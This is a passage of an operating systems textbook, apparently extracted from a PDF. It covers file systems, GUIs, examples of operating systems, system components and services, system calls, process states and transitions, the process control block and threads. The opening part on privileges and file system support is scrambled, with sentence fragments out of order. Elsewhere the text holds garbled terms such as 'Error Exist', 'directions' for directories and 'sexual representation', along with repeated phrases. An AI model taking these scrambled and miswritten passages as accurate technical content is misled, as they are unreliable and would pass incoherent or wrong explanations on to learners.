to what a standard user would receive. system-wide changes. When an application requests higher privileges or "Run as administrator" is clicked. (Journaling) VxFS. User applications. Some systems (such as Ubuntu and its derivatives) are configured by default to allow select users to run programs as the root user via the sudo command. and SUN Microsystems (open source. usually with the su or sudo command. File system support in modern operating systems: Support for file systems is highly varied among modern operating systems although there are several common file systems which almost all operating systems include support and drivers for.

OCFS. Due to its UNIX heritage Mac OS X now supports virtually all the file systems supported by the UNIX VFS. Journalized file systems: File systems may provide journaling. or even contained within a file located on another file system. and other operating systems. Others have been developed by companies to meet their specific needs. and as of Windows Vista. and is now comparable to the support available for other native UNIX file systems. Mac OS X: Mac OS X supports HFS+ with journaling as its primary file system. Mount Rainier is a newer extension to UDF supported by Linux 2. and keeps track of each operation taking place that changes the contents of the disk. then to its proper place in the ordinary file system.0. OCFS2. and makes poor use of disk space in situations where many small files are present. namely ext2. along with FAT (the MS-DOS file system). started work on porting Sun Microsystem's ZFS filesystem to Mac OS X and preliminary support is already available in Mac OS X 10. a file system more suitable for flash drives. Journaling is handled by the file system driver.. and the ISO 9660 and UDF filesystems used for CDs. The ext file systems. Modern Solaris based Operating Systems eclipse the need for Volume Management through leveraging virtual storage pools in ZFS. but cannot be installed to them. JFS. flash memory cards. DVDs. NTFS is the only file system which the operating system can be installed on.). although an open-source cross platform implementation known as NTFS 3G provides read-write support to Microsoft Windows NTFS file system for Mac OS X users. an USB key. or adapted from UNIX. digital cameras. It is derived from the Hierarchical File System of the earlier Mac OS. which is a log of file system operations. XFS. and other file systems. and/or throughput. Reiser4. Recently Apple Inc. NTFS (only read. and other optical discs such as BluRay. the system can recover to a consistent state 19 . making file operations time-consuming. Microsoft Windows: Microsoft Windows currently supports NTFS and FAT file systems.DVD. and HFS which is the primary file system for the Macintosh. Windows Vista Service Pack 1. ext3 and ext4 are based on the original Linux file system. capacity. and BluRay discs. and Windows Server 2008 support ExFAT. It is possible to install Linux on the majority of these file systems. Linux has full support for XFS and JFS. Legacy environments in Solaris may use Solaris Volume Manager (formerly known as Solstice DiskSuite.Logical Volume Management allows for spanning a file system across multiple devices for the purpose of adding redundancy.). ext3.. Microsoft Windows. DVDs.5. Performance of FAT compares poorly to most other file systems as it uses overly simplistic data structures. hobbyists. and many other portable devices because of their relative simplicity. In recent years support for Microsoft Windows NT's NTFS file system has appeared in Linux. Special-purpose files systems: FAT file systems are commonly found on floppy disks. Under Windows each file system is usually limited in application to certain media. Unlike other operating systems. ISO 9660 and Universal Disk Format (UDF) are supported which are standard file systems used on CDs. Mac OS X has facilities to read and write FAT. Linux: Many Linux distributions support some or all of ext2. ext4. GFS. Windows Embedded CE 6. for example CDs must use ISO 9660 or UDF. ReiserFS. whether it is a hard drive. Linux and UNIX allow any file system to be used regardless of the media it is stored in. UDF. In the event of a crash. ISO 9660 and Universal Disk Format are two common formats that target Compact Discs and DVDs. A journaled file system writes some information twice: first to the journal.) Multiple operating systems (including Solaris) may use Veritas Volume Manager. and NILFS.6 kernels and Windows Vista that facilitates rewriting to DVDs in the same fashion as has been possible with floppy disks. a disc (CD. GFS2. along with network file systems shared from other computers. which provides safe recovery in the event of a system crash.

by replaying a portion of the journal. Many UNIX file systems provide journaling including ReiserFS, JFS, and Ext3. In contrast, non-journaled file systems typically need to be examined in their entirety by a utility such as fsck or chkdsk for any inconsistencies after an unclean shutdown. Soft updates is an alternative to journaling that avoids the redundant writes by carefully ordering the update operations. Log-structured file systems and ZFS also differ from traditional journaled file systems in that they avoid inconsistencies by always writing new copies of the data, eschewing in-place updates. Graphical user interfaces: Most modern computer systems support graphical user interfaces (GUI), and often include them. In some computer systems, such as the original implementations of Microsoft Windows and the Mac OS, the GUI is integrated into the kernel. While technically a graphical user interface is not an operating system service, incorporating support for one into the operating system kernel can allow the GUI to be more responsive by reducing the number of context switches required for the GUI to perform its output functions. Other operating systems are modular, separating the graphics subsystem from the kernel and the Operating System. In the 1980s UNIX, VMS and many others had operating systems that were built this way. Linux and Mac OS X are also built this way. Modern releases of Microsoft Windows such as Windows Vista implement a graphics subsystem that is mostly in user-space, however versions between Windows NT 4.0 and Windows Server 2003's graphics drawing routines exist mostly in kernel space. Windows 9x had very little distinction between the interface and the kernel. Many computer operating systems allow the user to install or create any user interface they desire. The X Window System in conjunction with GNOME or KDE is a commonly-found setup on most Unix and Unix-like (BSD, Linux, Minix) systems. A number of Windows shell replacements have been released for Microsoft Windows, which offer alternatives to the included Windows shell, but the shell itself cannot be separated from Windows. Numerous Unix-based GUIs have existed over time, most derived from X11. Competition among the various vendors of Unix (HP, IBM, Sun) led to much fragmentation, though an effort to standardize in the 1990s to COSE and CDE failed for the most part due to various reasons, eventually eclipsed by the widespread adoption of GNOME and KDE. Prior to open source-based toolkits and desktop environments, Motif was the prevalent toolkit/desktop combination (and was the basis upon which CDE was developed). Graphical user interfaces evolve over time. For example, Windows has modified its user interface almost every time a new major version of Windows is released, and the Mac OS GUI changed dramatically with the introduction of Mac OS X in 1999.

Examples of Operating Systems
Microsoft Windows Microsoft Windows is a family of proprietary operating systems that originated as an add-on to the older MS-DOS operating system for the IBM PC. Modern versions are based on the newer Windows NT kernel that was originally intended for OS/2. Windows runs on x86, x86-64 and Itanium processors. Earlier versions also ran on the DEC Alpha, MIPS, Fairchild (later Intergraph) Clipper and PowerPC architectures (some work was done to port it to the SPARC architecture). As of June 2008, Microsoft Windows holds a large amount of the worldwide desktop market share. Windows is also used on servers, supporting applications such as web servers and database servers. In recent years, Microsoft has spent significant marketing and research & development 20

money to demonstrate that Windows is capable of running any enterprise application, which has resulted in consistent price/performance records (see the TPC) and significant acceptance in the enterprise market. The most widely used version of the Microsoft Windows family is Windows XP, released on October 25, 2001. In November 2006, after more than five years of development work, Microsoft released Windows Vista, a major new operating system version of Microsoft Windows family which contains a large number of new features and architectural changes. Chief amongst these are a new user interface and visual style called Windows Aero, a number of new security features such as User Account Control, and a few new multimedia applications such as Windows DVD Maker. A server variant based on the same kernel, Windows Server 2008, was released in early 2008. Windows 7 is currently under development; Microsoft has stated that it intends to scope its development to a three-year timeline, placing its release sometime after mid-2009. UNIX and UNIX-like operating systems Ken Thompson wrote B, mainly based on BCPL, which he used to write Unix, based on his experience in the MULTICS project. B was replaced by C, and Unix developed into a large, complex family of inter-related operating systems which have been influential in every modern operating system. The Unix-like family is a diverse group of operating systems, with several major sub-categories including System V, BSD, and Linux. The name "UNIX" is a trademark of The Open Group which licenses it for use with any operating system that has been shown to conform to their definitions. "Unix-like" is commonly used to refer to the large set of operating systems which resemble the original Unix. Unix-like systems run on a wide variety of machine architectures. They are used heavily for servers in business, as well as workstations in academic and engineering environments. Free software Unix variants, such as GNU, Linux and BSD, are popular in these areas. Market share statistics for freely available operating systems are usually inaccurate since most free operating systems are not purchased, making usage under-represented. On the other hand, market share statistics based on total downloads of free operating systems are often inflated, as there is no economic disincentive to acquire multiple operating systems so users can download multiple systems, test them, and decide which they like best. Some Unix variants like HP's HP-UX and IBM's AIX are designed to run only on that vendor's hardware. Others, such as Solaris, can run on multiple types of hardware, including x86 servers and PCs. Apple's Mac OS X, a hybrid kernel-based BSD variant derived from NeXTSTEP, Mach, and FreeBSD, has replaced Apple's earlier (non-Unix) Mac OS. Unix interoperability was sought by establishing the POSIX standard. The POSIX standard can be applied to any operating system, although it was originally created for various Unix variants. Mac OS X Mac OS X is a line of proprietary, graphical operating systems developed, marketed, and sold by Apple Inc., the latest of which is pre-loaded on all currently shipping Macintosh computers. Mac OS X is the successor to the original Mac OS, which had been Apple's primary operating system since 1984. Unlike its predecessor, Mac OS X is a UNIX operating system built on technology that 21

had been developed at NeXT through the second half of the 1980s and up until Apple purchased the company in early 1997. The operating system was first released in 1999 as Mac OS X Server 1.0, with a desktoporiented version (Mac OS X v10.0) following in March 2001. Since then, five more distinct "end-user" and "server" editions of Mac OS X have been released, the most recent being Mac OS X v10.5, which was first made available in October 2007. Releases of Mac OS X are named after big cats; Mac OS X v10.5 is usually referred to by Apple and users as "Leopard". The server edition, Mac OS X Server, is architecturally identical to its desktop counterpart but usually runs on Apple's line of Macintosh server hardware. Mac OS X Server includes work group management and administration software tools that provide simplified access to key network services, including a mail transfer agent, a Samba server, an LDAP server, a domain name server, and others.

Plan 9 Ken Thompson, Dennis Ritchie and Douglas McIlroy at Bell Labs designed and developed the C programming language to build the operating system Unix. Programmers at Bell Labs went on to develop Plan 9 and Inferno, which were engineered for modern distributed environments. Plan 9 was designed from the start to be a networked operating system, and had graphics built-in, unlike Unix, which added these features to the design later. Plan 9 has yet to become as popular as Unix derivatives, but it has an expanding community of developers. It is currently released under the Lucent Public License. Inferno was sold to Vita Nuova Holdings and has been released under a GPL/MIT license. Real-time operating systems A real-time operating system (RTOS) is a multitasking operating system intended for applications with fixed deadlines (real-time computing). Such applications include some small embedded systems, automobile engine controllers, industrial robots, spacecraft, industrial control, and some large-scale computing systems. An early example of a large-scale real-time operating system was Transaction Processing Facility developed by American Airlines and IBM for the Sabre Airline Reservations System. Embedded systems Embedded systems use a variety of dedicated operating systems. In some cases, the "operating system" software is directly linked to the application to produce a monolithic specialpurpose program. In the simplest embedded systems, there is no distinction between the OS and the application. Embedded systems that have fixed deadlines use a real-time operating system such as VxWorks, eCos, QNX, MontaVista Linux and RTLinux. Some embedded systems use operating systems such as Symbian OS, Palm OS, Windows CE, BSD, and Linux, although such operating systems do not support real-time computing. Windows CE shares similar APIs to desktop Windows but shares none of desktop Windows' codebase. Hobby development 22

Operating system development, or OSDev for short, as a hobby has a large cult-like following. As such, operating systems, such as Linux, have derived from hobby operating system projects. The design and implementation of an operating system requires skill and determination, and the term can cover anything from a basic "Hello World" boot loader to a fully featured kernel. One classical example of this is the Minix Operating System—an OS that was designed by A.S. Tanenbaum as a teaching tool but was heavily used by hobbyists before Linux eclipsed it in popularity. Other Older operating systems which are still used in niche markets include OS/2 from IBM; Mac OS, the non-Unix precursor to Apple's Mac OS X; BeOS; XTS-300. Some, most notably AmigaOS 4 and RISC OS, continue to be developed as minority platforms for enthusiast communities and specialist applications. OpenVMS formerly from DEC, is still under active development by Hewlett-Packard. There were a number of operating systems for 8 bit computers - Apple's DOS (Disk Operating System) 3.2 & 3.3 for Apple ][, ProDOS, UCSD, CP/M - available for various 8 and 16 bit environments. Research and development of new operating systems continues. GNU Hurd is designed to be backwards compatible with Unix, but with enhanced functionality and a microkernel architecture. Singularity is a project at Microsoft Research to develop an operating system with better memory protection based on the .Net managed code model. Systems development follows the same model used by other Software development, which involves maintainers, version control "trees", forks, "patches", and specifications. From the AT&T-Berkeley lawsuit the new unencumbered systems were based on 4.4BSD which forked as FreeBSD and NetBSD efforts to replace missing code after the Unix wars. Recent forks include DragonFly BSD and Darwin from BSD Unix.


24 .

not all systems have the same structure many modern operating systems share the same goal of supporting the following types of system components. Main-Memory Management Primary-Memory or Main-Memory is a large array of words or bytes. data transfer rate and access methods. Process Management The operating system manages many kinds of activities ranging from user programs to system programs like printer spooler.). File Management A file is a collected of related information defined by its creator. it must in the main memory. Each of these activities is encapsulated in a process. A process includes the complete execution context (code. magnetic disk and optical disk.CHAPTER 2 OPERATING SYSTEM STRUCTURE System Components Even though. 25 . The major activities of an operating in regard to memory-management are: • • • Keep track of which part of memory are currently being used and by whom. That is to say for a program to be executed. name servers. data. Decide which process are loaded into memory when memory space becomes available. Each word or byte has its own address. Allocate and deallocate memory space as needed. There are many processes can be running the same program. Each of these media has its own properties like speed. A process is only ONE instant of a program in execution. A mechanism for process synchronization. Suspension and resumption of processes. OS resources in use etc. PC. which provide long term storage. capacity. It is important to note that a process is not a program. The five major activities of an operating system in regard to process management are • • • • • Creation and deletion of user and system processes. registers. file server etc. Some examples of storage media are magnetic tape. A mechanism for deadlock handling. Computer can store files on the disk (secondary storage). A mechanism for process communication. Main-memory provides storage that can be access directly by the CPU.

secondary. The five main major activities of an operating system in regard to file management are 1. or a clock. 2. and its data are lost when power is lost. Each location in storage has an address. 3. secondary storage and cache storage. the set of all addresses available to a program is called an address space. The mapping of files onto secondary storage. disks. Secondary-Storage Management Generally speaking. Because main memory is too small to accommodate all data and programs. or users to the resources defined by a computer systems. 2. Protection refers to mechanism for controlling the access of programs. then the various processes must be protected from one another's activities. 5. The creation and deletion of directions. The support of primitives for manipulating files and directions. and the problems of contention and security. processes. These directories may contain files and other directions. the computer system must provide secondary storage to back up main memory. Scheduling the requests for memory access. systems have several levels of storage. Instructions and data must be placed in primary storage or cache to be referenced by a running program. peripheral devices. 3. and other media designed to hold information that will eventually be accessed in primary storage (primary. The three major activities of an operating system in regard to secondary storage management are: 1. The creation and deletion of files. Protection System If a computer systems has multiple users and allows the concurrent execution of multiple processes. I/O System Management I/O subsystem hides the peculiarities of specific hardware devices from the user. including primary storage. Managing the free space available on the secondary-storage device. Only the device driver knows the peculiarities of the specific device to whom it is assigned. Command Interpreter System 26 .A file system normally organized into directories to ease their use. Allocation of storage space when new files have to be written. Networking A distributed system is a collection of processors that do not share memory. 4. The back up of files on stable storage media. The communication-network design must consider routing and connection strategies. The processors communicate with one another through communication lines called network. cache) is ordinarily divided into bytes or words consisting of a fixed number of bytes. Secondary storage consists of tapes.

The operating systems provides this service. The user does not have to worry about secondary storage management. These functions cannot be given to the user-level programs. I cannot change the code of the kernel so I cannot modify the interface. File System Manipulation The output of a program may need to be written into new files or input taken from some files. Thus operating systems makes it easier for user programs to accomplished their task.. The speed of I/O that depends on secondary storage management is critical to the speed of many programs and hence I think it is best relegated to the operating systems to manage it than giving individual users the control of it. These things are taken care of by the operating systems. So the operating system by providing I/O makes it convenient for the users to run programs. in UNIX terminology) may be support by an operating system. since multiple command interpreters (shell. i. The user does not have to worry about the memory allocation or multitasking or anything. Program Execution The purpose of a computer systems is to allow the user to execute programs. Running a program involves the allocating and deallocating memory.A command interpreter is an interface of the operating system with the user.e. I am able to do that if the command interpreter is separate from the kernel. All the user sees is that the I/O has been performed without any details. User gives a command for reading or writing to a file and sees his/her task accomplished. I want to change the interface of command interpreter. This service involves secondary storage management. The user gives commands with are executed by operating system (usually by turning them into system calls). 27 . CPU scheduling in case of multiprocess. If the command interpreter is a part of the kernel it is possible for a malicious process to gain access to certain part of the kernel that it showed not have to avoid this ugly scenario it is advantageous to have the command interpreter separate from kernel. So the operating systems provides an environment where the user can conveniently run programs. If we want to change the way the command interpreter looks. So user-level programs cannot help the user to run programs independently without the help from operating systems. The operating systems hides the user the details of underlying hardware for the I/O. It is not difficult for the user-level programs to provide these services but for above mentioned reasons it is best if this service s left with operating system. Operating Systems Services Following are the five services provided by an operating systems to the convenience of the users. This involves the use of I/O. The main function of a command interpreter is to get and execute the next user specified command. For efficiently and protection users cannot control I/O so this service cannot be provided by user-level programs. There are two main advantages to separating the command interpreter from the kernel. and they do not really need to run in kernel mode. I/O Operations Each program requires an input and produces output. Command-Interpreter is usually not part of the kernel.

Communications There are instances where processes need to communicate with each other to exchange information. It may be between processes running on the same computer or running on the different computers. By providing this service the operating system relieves the user of the worry of passing messages between processes. In case where the messages need to be passed to processes on the other computers through a network it can be done by the user programs. The user program may be customized to the specifics of the hardware through which the message transits and provides the service interface to the operating system. Error Detection An error is one part of the system may cause malfunctioning of the complete system. To avoid such a situation the operating system constantly monitors the system for detecting the errors. This relieves the user of the worry of errors propagating to various part of the system and causing malfunctioning. This service cannot allowed to be handled by user programs because it involves monitoring and in cases altering area of memory or deallocation of memory for a faulty process. Or may be relinquishing the CPU of a process that goes into an infinite loop. These tasks are too critical to be handed over to the user programs. A user program if given these privileges can interfere with the correct (normal) operation of the operating systems.

System Calls and System Programs
System calls provide an interface between the process and the operating system. System calls allow user-level processes to request some services from the operating system which process itself is not allowed to do. In handling the trap, the operating system will enter in the kernel mode, where it has access to privileged instructions, and can perform the desired service on the behalf of user-level process. It is because of the critical nature of operations that the operating system itself does them every time they are needed. For example, for I/O a process involves a system call telling the operating system to read or write particular area and this request is satisfied by the operating system. System programs provide basic functioning to users so that they do not need to write their own environment for program development (editors, compilers) and program execution (shells). In some sense, they are bundles of useful system calls.

Layered Approach Design
In this case the system is easier to debug and modify, because changes affect only limited portions of the code, and programmer does not have to know the details of the other layers. Information is also kept only where it is needed and is accessible only in certain ways, so bugs affecting that data are limited to a specific module or layer.

Mechanisms and Policies
The policies what is to be done while the mechanism specifies how it is to be done. For instance, the timer construct for ensuring CPU protection is mechanism. On the other hand, the decision of how long the timer is set for a particular user is a policy decision. The separation of mechanism and policy is important to provide flexibility to a system. If the interface between mechanism and policy is well defined, the change of policy may affect only a few 28

parameters. On the other hand, if interface between these two is vague or not well defined, it might involve much deeper change to the system. Once the policy has been decided it gives the programmer the choice of using his/her own implementation. Also, the underlying implementation may be changed for a more efficient one without much trouble if the mechanism and policy are well defined. Specifically, separating these two provides flexibility in a variety of ways. First, the same mechanism can be used to implement a variety of policies, so changing the policy might not require the development of a new mechanism, but just a change in parameters for that mechanism, but just a change in parameters for that mechanism from a library of mechanisms. Second, the mechanism can be changed for example, to increase its efficiency or to move to a new platform, without changing the overall policy.



Definition of Process
The term "process" was first used by the designers of the MULTICS in 1960's. Since then, the term process, used somewhat interchangeably with 'task' or 'job'. The process has been given many definitions for instance • • • • • A program in Execution. An asynchronous activity. The 'animated sprit' of a procedure in execution. The entity to which processors are assigned. The 'dispatchable' unit.

And many more definitions have given. As we can see from above that there is no universally agreed upon definition, but the definition "Program in Execution" seem to be most frequently used. And this is a concept are will use in the present study of operating systems. Now that we agreed upon the definition of process, the question is what is the relation between process and program. It is same beast with different name or when this beast is sleeping (not executing) it is called program and when it is executing becomes process. Well, to be very precise. Process is not the same as program. In the following discussion we point out some of the difference between process and program. As we have mentioned earlier. Process is not the same as program. A process is more than a program code. A process is an 'active' entity as oppose to program which consider to be a 'passive' entity. As we all know that a program is an algorithm expressed in some suitable notation, (e.g., programming language). Being a passive, a program is only a part of process. Process, on the other hand, includes: • • • • • • Current value of Program Counter (PC) Contents of the processors registers Value of the variables The process stack (SP) which typically contains temporary data such as subroutine parameter, return address, and temporary variables. A data section that contains global variables. A process is the unit of work in a system.


Process State
The process state consist of everything necessary to resume the process execution if it is somehow put aside temporarily. The process state consists of at least following: • Code for the program. • Program's static data. • Program's dynamic data. • Program's procedure call stack. • Contents of general purpose registers. • Contents of program counter (PC) • Contents of program status word (PSW). • Operating Systems resource in use. A process goes through a series of discrete process states. New State: The process being created. Running State: A process is said to be running if it has the CPU, that is, process actually using the CPU at that particular instant. Blocked (or waiting) State: A process is said to be blocked if it is waiting for some event to happen such that as an I/O completion before it can proceed. Note that a process is unable to run until some external event happens. Ready State: A process is said to be ready if it use a CPU if one were available. A ready state process is runable but temporarily stopped running to let another process run. Terminated state: The process has finished execution.

Process Operations
Process Creation In general-purpose systems, some way is needed to create processes as needed during operation. There are four principal events led to processes creation. • System initialization. • Execution of a process Creation System calls by a running process. • A user request to create a new process. • Initialization of a batch job. Foreground processes interact with users. Background processes that stay in background sleeping but suddenly springing to life to handle activity such as email, webpage, printing, and so on. Background processes are called daemons. This call creates an exact clone of the calling process. A process may create a new process by some create process such as 'fork'. It choose to does so, creating process is called parent process and the created one is called the child processes. Only 31

one parent is needed to create a child process.g. Notice that each child has only one parent but each parent may have many children. only in the case of 'Ready' state. e. 32 . usually due to following reasons: • Normal Exist Most processes terminates because they have done their job. In some systems when a process kills all processes it created are killed as well (UNIX does not work this way). The 'Blocked' state is different from the 'Running' and 'Ready' states in that the process cannot run. Its resources are returned to the system. • Running State A process is said t be running if it currently has the CPU. have the same memory image. • Blocked (waiting) State When a process blocks. Logically. even if the CPU is available. the same environment strings and the same open files. • User starts a program. Netscape calls xv to display a picture. that is.. e. executing an illegal instruction. In both cases the process is willing to run. it does so because logically it cannot continue. For example. • Killed by another Process A process executes a system call telling the Operating Systems to terminate some other process. This creation of process (processes) yields a hierarchical structure of processes like one in the figure. In this state a process is unable to run until some external event happens. Following are some reasons for creation of a process • User logs on. the change is not visible to the other process. it is purged from any system lists or tables. • Operating systems creates process to provide service.e. • Ready State A process is said to be ready if it use a CPU if one were available. • Some program starts another process. both the parent and child have their own distinct address space. typically because it is waiting for input that is not yet available. referring non-existing memory or dividing by zero. • Error Exist When process discovers a fatal error.g. • Fatal Error An error caused by process due to a bug in program for example. this call is kill.. This call is exist in UNIX. If either process changes a word in its address space. the two processes. Formally. actually using the CPU at that particular instant. there is temporarily no CPU available for it. a user tries to compile a program that does not exist. It is runable but temporarily stopped to let another process run. Note that unlike plants and animals that use sexual representation. The new process terminates the existing process.. In UNIX. to manage printer. a process is said to be blocked if it is waiting for some event to happen (such as an I/O completion) before it can proceed. • Terminated State The process has finished execution. the parent and the child. and its process control block (PCB) is erased i. After the fork. the PCB's memory space is returned to a free memory pool. • New State The process being created. Process Termination A process terminates when it finishes executing its last statement. After a process is created. the 'Running' and 'Ready' states are similar. Process States A process goes through a series of discrete process states. a process has only one parent.

This state transition is: Time-Run-Out (process-name): Running → Ready. the running process voluntarily relinquishes the CPU. Transition 2 occurs when the scheduler decides that the running process has run long enough and it is time to let another process have CPU time. 33 . Transition 4 occurs when the external event for which a process was waiting (such as arrival of input) happens. Transition 3 occurs when all other processes have had their share and it is time for the first process to run again This state transition is: Dispatch (process-name): Ready → Running. This state transition is: Exit (process-name): Running → Terminated. If running process initiates an I/O operation before its allotted time expires. This state transition is: Block (process-name): Running → Block.Process State Transitions Following are six (6) possible transitions among above mentioned five (5) states Transition 1 occurs when process discovers that it cannot continue. This state transition is: Wakeup (process-name): Blocked → Ready. Transition 5 occurs when the process is created. Transition 6 occurs when the process has finished execution. This state transition is: Admitted (process-name): New → Ready.

34 . The priority of process (a part of CPU scheduling information). The processor it is running on. one after the other (this is a simplification. Unique identification of the process in order to track "which is which" information. for the full story. see superscalar CPU architecture).. Time-sharing allows processes to switch between being executed and waiting (to continue) to be executed. (This is known as concurrency or multiprogramming. the PCB is the data structure that defines a process to the operating systems. A computer program itself is just a passive collection of instructions.. (Concurrency is the term generally used to refer to several independent processes sharing a single processor. single-processor computer systems can perform time-sharing. or whatever. but time-sharing is still typically used to allow more than one process to run at a time. for example. The PCB is a certain store that allows the operating systems to locate key information about a process. providing the illusion that several processes are executing 'at once'. waiting. whether it is ready. Several processes may be associated with the same program.) Different processes may share the same set of instructions in memory (to save storage). Pointers to locate memory of processes. The PCB contains important information about the specific process including • • • • • • • • The current state of the process i. a pointer to child process (if it exists). each with their own processor.) Using more than one physical processor on a computer. permits true simultaneous execution of more than one stream of instructions from different processes. opening up several instances of the same program often means more than one process is being executed. while a process is the actual execution of those instructions. Thus. A register save area.Process Control Block A process in an operating system is represented by a data structure known as a process control block (PCB) or process descriptor. In most cases this is done very rapidly. but this is not known to any one process. a process is an instance of a computer program.g. Each execution of the same set of instructions is known as an instance— a completely separate instantiation of the program. that is being sequentially executed by a computer system that has the ability to run several computer programs concurrently. A pointer to parent process. consisting of one or more threads.e. running. Similarly. simultaneously is used to refer to several processes. In the computing world. processes are formally defined by the operating system (OS) running them and so may differ in detail from one OS to another. To allow users to run several programs at once (e. Process (computing) In computing. so that processor time is not wasted waiting for input from a resource). A single computer processor executes one or more (multiple) instructions at a time (per clock cycle).

for example based on response time constraints. One thread per request would reduce the response time substantially for many users and may reduce the CPU idle time and increase the utilization of CPU and network capacity. Thus. This results in that the entered text is shown immediately on the screen. However. Sub-processes and multi-threading Thread (computer science) A process may split itself into multiple 'daughter' sub-processes or threads that execute in parallel. since the CPU may switch to low-priority tasks while waiting for other events to occur. a word processor could perform a spell check as the user types. 35 . without "freezing" the application . Multithreading is useful when various 'events' are occurring in an unpredictable order. and a second thread that processes the requests one by one in a first-come first-served manner. In case the communication protocol between the client and server is a communication session involving a sequence of several messages and responses in each direction (which is the case in the TCP transport protocol used in for web browsing). since they may have to wait in queue. Multithreading makes it possible for the processing of one event to be temporarily interrupted by an event of higher priority. single-threaded processes have the advantage of even lower overhead. to serve requests from several users concurrently. while spelling mistakes are indicated or corrected after a longer time. we can avoid that requests are left unheard if the server is busy with processing a request. this approach would result in long response time also for requests that do not require long processing time. However. if the processing time is very long for some requests (such as large file requests or requests from users with slow network access data rate).a high-priority thread could handle user input and update the display. Multithreading allows a server. while a low-priority background process runs the time-consuming spell checking utility. For example. the same instructions on logically different resources and data). creating one thread per communication session would reduce the complexity of the program substantially. since each thread is an instance with its own state and variables. providing strictly mediated and controlled interprocess communication functionality. multi-threading would make it possible for a client such as a web browser to communicate efficiently with several servers concurrently. running different instructions on much of the same resources and data (or. as noted. A process that has only one thread is referred to as a single-threaded process. One simple solution to that problem is one thread that puts every incoming request in a queue. Multithreading may result in more efficient CPU time utilization. In a similar fashion. such as a web server. Representation In general.For security and reliability reasons most modern operating systems prevent direct communication between 'independent' processes. and should be processed in another order than they occur. Multi-threaded processes have the advantage over multi-process systems that they can perform several tasks concurrently without the extra overhead needed to create a new process and handle synchronised communication between these processes. while a process with multiple threads is referred to as a multi-threaded process. a computer system process consists of (or is said to 'own') the following resources: • An image of the executable machine code associated with a program.

but this is transparent in a virtual memory system. Processor state (context). and a heap to hold intermediate computation data generated during run time. it is eligible for swapping to disk. process-specific data (input and output). and processes as defined by process calculi.) The above description applies to both processes managed by an operating system. where blocks of memory values may be really on disk and not in main memory at any time. but typically at least the processor state. however. a call stack (to keep track of active subroutines and/or other events). such as the process owner and the process' set of permissions (allowable operations). and 'daughter' ('child') processes with any spin-off. The state is typically stored in computer registers when the process is executing. it will be blocked. the same reentrant program at the same location in memory— but each process is said to own its own image of the program. If a process requests something for which it must wait. such as file descriptors (Unix terminology) or handles (Windows). many processes may run off of. Any subset of resources. Security attributes.g. such as the content of registers. or share. parallel processes. may be associated with each of the process' threads in operating systems that support threads or 'daughter' processes. Process management in multi-tasking operating systems Process management (computing) A multitasking* operating system may just switch between processes to give the appearance of many processes executing concurrently or simultaneously. It is usual to associate a single process with a main program. The sense of 'process' (or task) is 'something that takes up time'. deadlock or thrashing). and data sources and sinks. though in fact only one process can be executing at any one time on a single-core CPU (unless using multi-threading or other similar technology). • • • The operating system holds most of this information about active processes in data structures called process control blocks (PCB). but the term 'task' seems to be dropping from the computer lexicon.. that in multiprocessing systems.) Processes are often called tasks in embedded operating systems. and in memory otherwise. of which an image of its program (in memory) is one such resource. as opposed to 'memory'. which is 'something that takes up space'. physical memory addressing.• Memory (typically some region of virtual memory). Note that even unused portions of active processes/tasks (executing programs) are eligible for 36 . The operating system keeps its processes separated and allocates the resources they need so that they are less likely to interfere with each other and cause system failures (e. Operating system descriptors of resources that are allocated to the process. When the process is in the Blocked State. A process is said to own resources. (Historically. The operating system may also provide mechanisms for inter-process communication to enable processes to interact in safe and predictable ways. (Note. which includes the executable code. which behave like asynchronous subroutines. etc. the terms 'task' and 'process' were used interchangeably.

We’re starting with CPU as a resource. All parts of an executing program and its data do not have to be in physical memory for the associated process to be active. In Process model. but they have similar functionality... It is possible for both processes to run even on different machines. Process state is changed back to "waiting" state when process no longer needs to wait. and processor executes processes instructions.it is loaded from secondary storage device (hard disk or CDROM. which allows multi-tasking. the term process is generally preferred over task. with arrows indicating possible transitions between states. needs process to have certain states. History 37 . each process has its own virtual CPU. so we need an abstraction of CPU use. (The rapid switching back and forth is called multiprogramming). • • First. Conceptually. Process is removed instantly or is moved to the "terminated" state. all software on the computer is organized into a number of sequential processes. • • Inter-process communication When processes communicate with each other it is called "Inter-process communication" (IPC). since the alternative term. Names of these states are not standardised. A process includes PC. Note the difference between a program and a process. and variables. Operating system kernel. or is terminated by the operating system. the CPU switches back and forth among processes. The process state then becomes "running". Today. the process is "created" . the ls instance running on a computer is a process. although they have somewhat different terminological histories. The ls program on disk is a program. it is no longer needed. they have come to be used as synonyms.. *Tasks and processes refer essentially to the same entity. therefore some mediators (called protocols) are needed. except when referring to 'multitasking'. In reality. Once the process finishes execution. The operating system (OS) differ one to another.swapping to disk.)it is assigned "blocked" state. 'multiprocessing'. When process is "waiting" it waits for scheduler to do so-called context switch and load the process into the processor. (Other defs: “the thing pointed to by a PCB” to “the animated spirit of a procedure”). We define a process as the OS’s representation of a program in execution so that we can allocate CPU time to it. is too easy to confuse with multiprocessor (which is a computer with two or more CPUs). displayed in a state diagram. When remove it just waits to be removed from main memory. And. If a process needs to wait for a resource (wait for user input or file to open . registers.) into main memory. After that process scheduler assigns him state "waiting".. Process states The various process states.

. Threads came somewhat later. the old "multiprogramming" gave way to true multitasking. multiprocessing and. concurrent). Program might need some resource (input . The concept of a process was born. Single processor can run only one instruction at a time. To use processor at all time the execution of such program was halted. Blocked The process is waiting for some external event. later. Processes in Action At any given moment a process is in one of several states: These gender-neutral terms are something of an innovation. for example disk I/O Ready The process is ready to run 38 . e. At that point.) which has "big" delay.. Shortly thereafter.e. Program might start some slow operation (output to printer . It made multiprogramming possible and necessary.By the early 60s computer control software had evolved from Monitor control software. talk of father and son processes was more common. This tradition worked in reverse at IBM. In the early days of computer science.).. uniprocessor) and shared scarce resources. Computers got "faster" and computer time was still neither "cheap" nor fully used. User percieved that programs run "at the same time" (hence the term. where processes were female. a much broader term. Multiprogramming is also basic form of multiprocessing. Only one process is in this state on a given processor.. computer networks. This became necessary with the invention of re-entrant code. IBSYS. Multiprogramming means that several programs run "at the same time" (concurrently). multiple-CPU. the notion of a 'program' was expanded to the notion of an 'executing program and its context'. etc.. this is one of the few times where IBM nomenclature is more sensible. • • • • • running ready blocked Dispatch Quantum expired Block for IO IO completes The functions of the states are: • • • Running the process is executing on the processor.. with the advent of time-sharing. However.g. shared memory computers. multithreading. Programs consist of sequence of instruction for processor. Therefore it is impossible to run more programs at the same time. At first they ran on a single processor (i.. This all leads to processor being "idle" (unused). to Executive control software. Because male mammals don’t bear young. a second (or nth) program was started or restarted.

